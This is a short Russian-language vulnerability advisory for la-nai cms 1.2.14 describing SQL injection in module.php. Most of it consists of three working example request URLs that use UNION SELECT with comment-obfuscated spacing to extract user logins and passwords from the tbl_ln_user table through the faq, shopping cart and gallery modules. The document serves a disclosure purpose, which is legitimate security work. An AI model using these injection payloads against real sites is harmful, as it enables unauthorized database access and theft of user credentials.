Программа: la-nai cms 1.2.14

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных сценарием module.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

http://localhost/lanai-cms_v1.2.14/module.php? modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/*
*/UNION/**/ALL/**/SELECT/**/1,2,userLogin,
userPassword,5,6,7/**/FROM/**/tbl_ln_user/*

http://localhost/lanai-cms_v1.2.14/module.php? modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/*
*/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*

http://localhost/lanai-cms_v1.2.14/module.php? modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/*
*/ALL/**/SELECT/**/1,userLogin, userPassword,4/**/FROM/**/tbl_ln_user/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии